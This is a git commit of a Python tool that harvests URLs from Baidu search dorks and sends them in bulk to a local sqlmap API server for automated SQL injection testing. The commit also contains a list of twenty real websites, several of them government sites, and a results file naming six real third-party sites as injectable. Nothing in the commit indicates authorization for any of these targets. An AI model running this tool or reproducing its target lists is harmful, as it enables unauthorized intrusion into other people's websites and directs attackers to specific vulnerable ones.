seconde commit

This commit is contained in:
sowish
2015-11-14 11:35:55 +08:00
commit 813f305db8
10 changed files with 451 additions and 0 deletions

164
AutoSqli.py Executable file
View File

@@ -0,0 +1,164 @@
#!/usr/bin/python
#-*-coding:utf-8-*-
import requests
import time
import json
import threading
import Queue
from search.baidu import *
class AutoSqli(object):
"""
使用sqlmapapi的方法进行与sqlmapapi建立的server进行交互
"""
def __init__(self, server='', target='',data = '',referer = '',cookie = ''):
super(AutoSqli, self).__init__()
self.server = server
if self.server[-1] != '/':
self.server = self.server + '/'
self.target = target
self.taskid = ''
self.engineid = ''
self.status = ''
self.data = data
self.referer = referer
self.cookie = cookie
self.start_time = time.time()
def task_new(self):
self.taskid = json.loads(
requests.get(self.server + 'task/new').text)['taskid']
#print 'Created new task: ' + self.taskid
if len(self.taskid) > 0:
return True
return False
def task_delete(self):
json_kill=requests.get(self.server + 'task/' + self.taskid + '/delete').text
# if json.loads(requests.get(self.server + 'task/' + self.taskid + '/delete').text)['success']:
# #print '[%s] Deleted task' % (self.taskid)
# return True
# return False
def scan_start(self):
headers = {'Content-Type': 'application/json'}
print "starting to scan "+ self.target +".................."
payload = {'url': self.target}
url = self.server + 'scan/' + self.taskid + '/start'
t = json.loads(
requests.post(url, data=json.dumps(payload), headers=headers).text)
self.engineid = t['engineid']
if len(str(self.engineid)) > 0 and t['success']:
#print 'Started scan'
return True
return False
def scan_status(self):
self.status = json.loads(
requests.get(self.server + 'scan/' + self.taskid + '/status').text)['status']
if self.status == 'running':
return 'running'
elif self.status == 'terminated':
return 'terminated'
else:
return 'error'
def scan_data(self):
self.data = json.loads(
requests.get(self.server + 'scan/' + self.taskid + '/data').text)['data']
if len(self.data) == 0:
#print 'not injection\t'
pass
else:
f=open('data/injection.txt','a')
f.write(self.target+'\n')
print 'injection \t'
def option_set(self):
headers = {'Content-Type': 'application/json'}
option = {"options": {
"randomAgent": True,
"tech":"BT"
}
}
url = self.server + 'option/' + self.taskid + '/set'
t = json.loads(
requests.post(url, data=json.dumps(option), headers=headers).text)
#print t
def scan_stop(self):
json_stop=requests.get(self.server + 'scan/' + self.taskid + '/stop').text
# json.loads(
# requests.get(self.server + 'scan/' + self.taskid + '/stop').text)['success']
def scan_kill(self):
json_kill=requests.get(self.server + 'scan/' + self.taskid + '/kill').text
# json.loads(
# requests.get(self.server + 'scan/' + self.taskid + '/kill').text)['success']
def run(self):
if not self.task_new():
return False
self.option_set()
if not self.scan_start():
return False
while True:
if self.scan_status() == 'running':
time.sleep(10)
elif self.scan_status() == 'terminated':
break
else:
break
#print time.time() - self.start_time
if time.time() - self.start_time > 500:
error = True
self.scan_stop()
self.scan_kill()
break
self.scan_data()
self.task_delete()
#print time.time() - self.start_time
class myThread(threading.Thread):
def __init__(self,q,thread_id):
threading.Thread.__init__(self)
self.q=q
self.thread_id=thread_id
def run(self):
while not self.q.empty():
#print "threading "+str(self.thread_id)+" is running"
objects=self.q.get()
result=objects.run()
if __name__ == '__main__':
urls=[]
print 'the program starts!'
key='inurl:asp?id='
pages=3
urls=geturl(key,pages)
#print urls
workQueue=Queue.Queue()
for tar in urls:
s = AutoSqli('http://127.0.0.1:8775', tar)
workQueue.put(s)
threads = []
nloops = range(4) #threads Num
for i in nloops:
t = myThread(workQueue,i)
t.start()
threads.append(t)
for i in nloops:
threads[i].join()
print "Exiting Main Thread"
# t = AutoSqli('http://127.0.0.1:8775', 'http://www.changan-mazda.com.cn/market/runningmen/article.php?id=191')
# t.run()

0
README Normal file
View File

6
data/injection.txt Executable file
View File

@@ -0,0 +1,6 @@
http://www.lamarche.com.tw/production_detail.php?shop_category=64&sn=248
http://www.70jj.com/shop/index.php?shop_id=1
http://www.cosmax.com.hk/products_detail.php?product_id=17
http://www.etron.com/en/products/u3hc_detial.php?Product_ID=5
http://www.fembooks.com.tw/indexstore.php?product_id=5423
http://www.guangzhouflower.net.cn/product.php?pid=12

20
data/targets.txt Executable file
View File

@@ -0,0 +1,20 @@
http://www.99166.com/zjinfo.asp?id=5
http://www.yh8z.com/Secondary/guding.asp?Id=68&Parent_ID=18&Type_Class=news&GS_Class=22
http://www.gdkszx.com.cn/ksxx/kszc_show.asp?id=2205
http://www.smxs.gov.cn/viewtexti.asp?id=275079&npage=6
http://www.juancheng.gov.cn/wsbs-view.asp?id=9285
http://rc.sz.zj.cn/company.asp?id=4291
http://www.law-lib.com/fxj/fxj.asp?id=940
http://www.kfws.gov.cn/Article_read.asp?id=2289
http://www.zjghtcm.com/new_show.asp?id=1178
http://www.medsci.cn/sci/journal.asp?id=0bc61099
http://www.dylaw.gov.cn/zhongc/web60/classshow.asp?id=51848&classid=15
http://club.kdnet.net/dispbbs.asp?id=11095423&boardid=1
http://people.rednet.cn/PeopleShow.asp?ID=2410432
http://www.dhzsxx.com/ShowNews.asp?id=1591
http://www.chinawutong.com/co/huoyuan_01/index.asp?id=213633
http://news.chinaxinge.com/shownews.asp?id=53866&sjm=49600b363e048e05
http://www.gxxgty.com/news_show.asp?id=1583
http://szb.keq0475.com/Qnews.asp?ID=49506
http://www.cyfy.cn/kssz.asp?id=42
http://www.szkweekly.com/List.asp?ID=54284

1
keyword.txt Executable file
View File

@@ -0,0 +1 @@
site:.hk inurl:.php?

0
search/__init__.py Executable file
View File

BIN
search/__init__.pyc Executable file

Binary file not shown.

88
search/baidu.py Executable file
View File

@@ -0,0 +1,88 @@
#coding: utf-8
import urllib2
import string
import urllib
import re
import random
user_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0', \
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0', \
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533+ \
(KHTML, like Gecko) Element Browser 5.0', \
'IBM WebExplorer /v0.94', 'Galaxy/1.0 [en] (Mac OS X 10.5.6; U; en)', \
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', \
'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14', \
'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) \
Version/6.0 Mobile/10A5355d Safari/8536.25', \
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/28.0.1468.0 Safari/537.36', \
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; TheWorld)']
def baidu_search(keyword,pn):
p= {'wd': keyword}
res=urllib2.urlopen(("http://www.baidu.com/s?"+urllib.urlencode(p)+"&pn={0}&cl=3&rn=10").format(pn)) #rn为每页的显示数目 pn表示当前显示的是第pn条搜索结果
html=res.read()
return html
def getList(regex,text): #将获取的url去重并存入list
arr = []
res = re.findall(regex, text)
if res:
for r in res:
arr.append(r)
return arr
def getMatch(regex,text): #匹配函数
res = re.findall(regex, text)
if res:
return res[0]
return ''
def is_get(url): #是否是sqlmap可识别的get型链接
regex=r'(\S*?)\?.*=.*'
res=re.match(regex,url)
if res:
#print res.group(1)
return res.group(1)
else:
return 0
# def Deduplication():
# regex=r'\S'
def geturl(keyword,pages): #获取url
targets = []
hosts=[]
for page in range(0,int(pages)):
pn=(page+1)*10
html = baidu_search(keyword,pn)
content = unicode(html, 'utf-8','ignore')
arrList = getList(u"<div class=\"f13\">(.*)</div>", content) #分割页面块
#print arrList
# f2=open('content.txt','a')
# f2.write(str(arrList)+'\n')#调试使用,获取内容
# f2.close()
for item in arrList:
regex = u"data-tools='\{\"title\":\"(.*)\",\"url\":\"(.*)\"\}'"
link = getMatch(regex,item)
url=link[1] #获取百度改写url
try:
domain=urllib2.Request(url)
r=random.randint(0,11)
domain.add_header('User-agent', user_agents[r])
domain.add_header('connection','keep-alive')
response=urllib2.urlopen(domain)
uri=response.geturl() #获取真实url
urs=is_get(uri) #是否是传统的get型
if (uri in targets) or (urs in hosts) :
continue
else:
targets.append(uri)
hosts.append(urs)
f1=open('data/targets.txt','a') #存放url链接
f1.write(uri+'\n')
f1.close()
except:
continue
print "urls have been grabed already!!!"
return targets

BIN
search/baidu.pyc Executable file

Binary file not shown.

172
set_option.txt Executable file
View File

@@ -0,0 +1,172 @@
{
"options": {
"crawlDepth": null,
"osShell": false,
"getUsers": false,
"getPasswordHashes": false,
"excludeSysDbs": false,
"uChar": null,
"regData": null,
"cpuThrottle": 5,
"prefix": null,
"code": null,
"googlePage": 1,
"query": null,
"randomAgent": false,
"delay": 0,
"isDba": false,
"requestFile": null,
"predictOutput": false,
"wizard": false,
"stopFail": false,
"forms": false,
"taskid": "73674cc5eace4ac7",
"skip": null,
"dropSetCookie": false,
"smart": false,
"risk": 1,
"sqlFile": null,
"rParam": null,
"getCurrentUser": false,
"notString": null,
"getRoles": false,
"getPrivileges": false,
"testParameter": null,
"tbl": null,
"charset": null,
"trafficFile": null,
"osSmb": false,
"level": 1,
"secondOrder": null,
"pCred": null,
"timeout": 30,
"firstChar": null,
"updateAll": false,
"binaryFields": false,
"checkTor": false,
"aType": null,
"direct": null,
"saFreq": 0,
"tmpPath": null,
"titles": false,
"getSchema": false,
"identifyWaf": false,
"checkWaf": false,
"regKey": null,
"limitStart": null,
"loadCookies": null,
"dnsName": null,
"csvDel": ",",
"oDir": null,
"osBof": false,
"invalidLogical": false,
"getCurrentDb": false,
"hexConvert": false,
"answers": null,
"host": null,
"dependencies": false,
"cookie": null,
"proxy": null,
"regType": null,
"optimize": false,
"limitStop": null,
"mnemonics": null,
"uFrom": null,
"noCast": false,
"testFilter": null,
"eta": false,
"threads": 1,
"logFile": null,
"os": null,
"col": null,
"rFile": null,
"verbose": 1,
"aCert": null,
"torPort": null,
"privEsc": false,
"forceDns": false,
"getAll": false,
"api": true,
"url": null,
"invalidBignum": false,
"regexp": null,
"getDbs": false,
"freshQueries": false,
"uCols": null,
"smokeTest": false,
"pDel": null,
"wFile": null,
"udfInject": false,
"tor": false,
"forceSSL": false,
"beep": false,
"saveCmdline": false,
"configFile": null,
"scope": null,
"dumpAll": false,
"torType": "HTTP",
"regVal": null,
"dummy": false,
"commonTables": false,
"search": false,
"skipUrlEncode": false,
"referer": null,
"liveTest": false,
"purgeOutput": false,
"retries": 3,
"extensiveFp": false,
"dumpTable": false,
"database": "/tmp/sqlmapipc-EmjjlQ",
"batch": true,
"headers": null,
"flushSession": false,
"osCmd": null,
"suffix": null,
"dbmsCred": null,
"regDel": false,
"shLib": null,
"nullConnection": false,
"timeSec": 5,
"msfPath": null,
"noEscape": false,
"getHostname": false,
"sessionFile": null,
"disableColoring": true,
"getTables": false,
"agent": null,
"lastChar": null,
"string": null,
"dbms": null,
"tamper": null,
"hpp": false,
"runCase": null,
"osPwn": false,
"evalCode": null,
"cleanup": false,
"getBanner": false,
"profile": false,
"regRead": false,
"bulkFile": null,
"safUrl": null,
"db": null,
"dumpFormat": "CSV",
"alert": null,
"user": null,
"parseErrors": false,
"aCred": null,
"getCount": false,
"dFile": null,
"data": null,
"regAdd": false,
"ignoreProxy": false,
"getColumns": false,
"mobile": false,
"googleDork": null,
"sqlShell": false,
"pageRank": false,
"tech": "BEUSTQ",
"textOnly": false,
"commonColumns": false,
"keepAlive": false
}
}